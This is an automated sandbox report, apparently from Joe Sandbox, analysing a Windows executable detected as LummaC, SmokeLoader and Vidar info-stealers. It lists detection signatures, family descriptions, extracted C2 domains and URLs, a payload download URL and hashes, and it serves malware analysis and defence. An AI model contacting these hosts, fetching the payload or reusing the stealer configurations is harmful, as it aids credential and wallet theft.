Windows Analysis Report
xvJv1BpknZ.exe

Overview

General Information

Sample name:	xvJv1BpknZ.exe renamed because original name is a hash value
Original sample name:	c5261e67bd6d58771e27d7214e8f1c8f.exe
Analysis ID:	1448044
MD5:	c5261e67bd6d58771e27d7214e8f1c8f
SHA1:	6fd857b3ebdb3888785d41f20277bc4e045bf704
SHA256:	09d1eba82060a4ff75575b471d563a5e02485e0aaa3afe743802a50d6e987410
Tags:	32exe
Infos:

Detection

LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected CryptOne packer

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected SmokeLoader

Yara detected Vidar

Yara detected Vidar stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Found many strings related to Crypto-Wallets (likely being stolen)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Opens network shares

Query firmware table information (likely to detect VMs)

Sample uses process hollowing technique

Sample uses string decryption to hide its real strings

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: Execution of Suspicious File Type Extension

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara detected Keylogger Generic

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://darktrace.com/blog/the-rise-of-the-lumma-info-stealer https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-lummac2-94111d4b1e11	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Signatures

AV Detection

Antivirus detection for URL or domain

Source: whispedwoodmoodsksl.shop	Avira URL Cloud: Label: malware
Source: http://guteyr.cc/tmp/index.php	Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/D	Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/H	Avira URL Cloud: Label: malware
Source: http://45.129.96.86/file/update.exe	Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/n	Avira URL Cloud: Label: malware
Source: holicisticscrarws.shop	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\5876.exe

Avira: detection malicious, Label: TR/AVI.AceCrypter.javlp

Found malware configuration

Source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://dbfhns.in/tmp/index.php", "http://guteyr.cc/tmp/index.php", "http://greendag.ru/tmp/index.php", "http://lobulraualov.in.net/tmp/index.php"]}
Source: 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "42d0618304a88d6476bc55d33c23d7e6", "Version": "9.8"}
Source: 7.3.5876.exe.2170000.0.raw.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop"], "Build id": "swg5EG--"}

Multi AV Scanner detection for domain / URL

Source: whispedwoodmoodsksl.shop	Virustotal: Detection: 17%	Perma Link
Source: dbfhns.in	Virustotal: Detection: 5%	Perma Link
Source: http://guteyr.cc/tmp/index.php	Virustotal: Detection: 15%	Perma Link
Source: whispedwoodmoodsksl.shop	Virustotal: Detection: 17%	Perma Link
Source: http://45.129.96.86/file/update.exe	Virustotal: Detection: 20%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\5876.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\etrtabd	ReversingLabs: Detection: 28%

Multi AV Scanner detection for submitted file

Source: xvJv1BpknZ.exe

Virustotal: Detection: 34%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\etrtabd	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: xvJv1BpknZ.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 7.3.5876.exe.2170000.0.raw.unpack	String decryptor: boredimperissvieos.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack	String decryptor: holicisticscrarws.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack	String decryptor: sweetsquarediaslw.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack	String decryptor: plaintediousidowsko.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack	String decryptor: miniaturefinerninewjs.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack	String decryptor: zippyfinickysofwps.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack	String decryptor: obsceneclassyjuwks.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack	String decryptor: acceptabledcooeprs.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack	String decryptor: whispedwoodmoodsksl.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 7.3.5876.exe.2170000.0.raw.unpack	String decryptor: TeslaBrowser/5.5
Source: 7.3.5876.exe.2170000.0.raw.unpack	String decryptor: - Screen Resoluton:
Source: 7.3.5876.exe.2170000.0.raw.unpack	String decryptor: - Physical Installed Memory:
Source: 7.3.5876.exe.2170000.0.raw.unpack	String decryptor: Workgroup: -
Source: 7.3.5876.exe.2170000.0.raw.unpack	String decryptor: swg5EG--

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_0041537E CryptUnprotectData,	7_2_0041537E
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D11A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	12_2_6D11A9A0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1625B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	12_2_6D1625B0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0E4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	12_2_6D0E4420
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D114440 PK11_PrivDecrypt,	12_2_6D114440
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1144C0 PK11_PubEncrypt,	12_2_6D1144C0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D13A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	12_2_6D13A730
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D11A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	12_2_6D11A650
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0F8670 PK11_ExportEncryptedPrivKeyInfo,	12_2_6D0F8670
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0FE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	12_2_6D0FE6E0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D140180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	12_2_6D140180
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1143B0 PK11_PubEncryptPKCS1,PR_SetError,	12_2_6D1143B0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D13BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	12_2_6D13BD30
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0F7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	12_2_6D0F7D60
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D137C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	12_2_6D137C00
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D113FF0 PK11_PrivDecryptPKCS1,	12_2_6D113FF0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D139EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	12_2_6D139EC0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D113850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	12_2_6D113850
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D119840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,	12_2_6D119840
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D13DA40 SEC_PKCS7ContentIsEncrypted,	12_2_6D13DA40
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D113560 PK11_Decrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	12_2_6D113560

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\5876.exe

Unpacked PE file: 7.2.5876.exe.400000.0.unpack

Uses 32bit PE files

Source: xvJv1BpknZ.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53066 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53068 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53071 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53074 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53076 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53077 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53082 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.8:53085 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53086 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 37.27.34.12:443 -> 192.168.2.8:53087 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: katDDA4.tmp, 0000000C.00000002.2589136080.000000006E6CD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.12.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.12.dr, freebl3.dll.12.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.12.dr, freebl3.dll.12.dr
Source:	Binary string: nss3.pdb@ source: katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, nss3[1].dll.12.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.12.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.12.dr, vcruntime140.dll.12.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.12.dr, msvcp140[1].dll.12.dr
Source:	Binary string: nss3.pdb source: katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, nss3[1].dll.12.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.dr
Source:	Binary string: mozglue.pdb source: katDDA4.tmp, 0000000C.00000002.2589136080.000000006E6CD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.12.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.12.dr

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000910h]	7_2_00427353
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000080h]	7_2_00427353
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov word ptr [eax], cx	7_2_004168EF
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	7_2_00409960
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	7_2_00409960
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]	7_2_00404970
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ecx, dword ptr [esp+00000084h]	7_2_00415FE1
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then dec edx	7_2_0043B050
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	7_2_00417062
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ecx, dword ptr [esi+04h]	7_2_00417062
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	7_2_00426174
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, dword ptr [esp+54h]	7_2_004381BB
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	7_2_00426271
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	7_2_00426284
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, dword ptr [esp+000001E0h]	7_2_004102B2
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	7_2_004164D2
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, 00008000h	7_2_00403570
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then cmp cl, 0000002Eh	7_2_00421580
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	7_2_004025A0
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then cmp byte ptr [ebp+00h], 00000000h	7_2_00414660
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov edi, ebx	7_2_00436670
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	7_2_00431680
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, dword ptr [esp+000000C0h]	7_2_004106B1
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov dword ptr [esp+000005F0h], 00000000h	7_2_004138D2
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	7_2_004248E0
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ecx, dword ptr [esi+30h]	7_2_00423931
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ecx, dword ptr [esi+30h]	7_2_00423AD0
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then jmp edx	7_2_00422AFB
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, dword ptr [esp+4Ch]	7_2_00415AFA
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	7_2_0040CB10
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, dword ptr [esp+000001E0h]	7_2_0040FBB4
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then jmp edx	7_2_0041CCD0
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	7_2_00425CEE
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov edx, dword ptr [esi+10h]	7_2_00423C97
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ecx, dword ptr [esi+08h]	7_2_00433D0A
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then movzx esi, word ptr [ecx]	7_2_00438F15
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ecx, dword ptr [esp+00000084h]	7_2_02136248
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then dec edx	7_2_0215B2B7
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	7_2_021372C9
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ecx, dword ptr [esi+04h]	7_2_021372C9
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then cmp cl, 0000002Eh	7_2_021412E0
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	7_2_021463DB
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then jmp edx	7_2_0213D097
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then movzx esi, word ptr [ecx]	7_2_0215917C
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	7_2_02136739
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, 00008000h	7_2_021237D7
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	7_2_021464D8
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	7_2_021464EB
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, dword ptr [esp+000001E0h]	7_2_02130519
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000910h]	7_2_021475BA
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000080h]	7_2_021475BA
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov word ptr [eax], cx	7_2_02136B56
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	7_2_02144B47
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ecx, dword ptr [esi+30h]	7_2_02143B98
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]	7_2_02124BD7
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	7_2_02129BC7
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	7_2_02129BC7
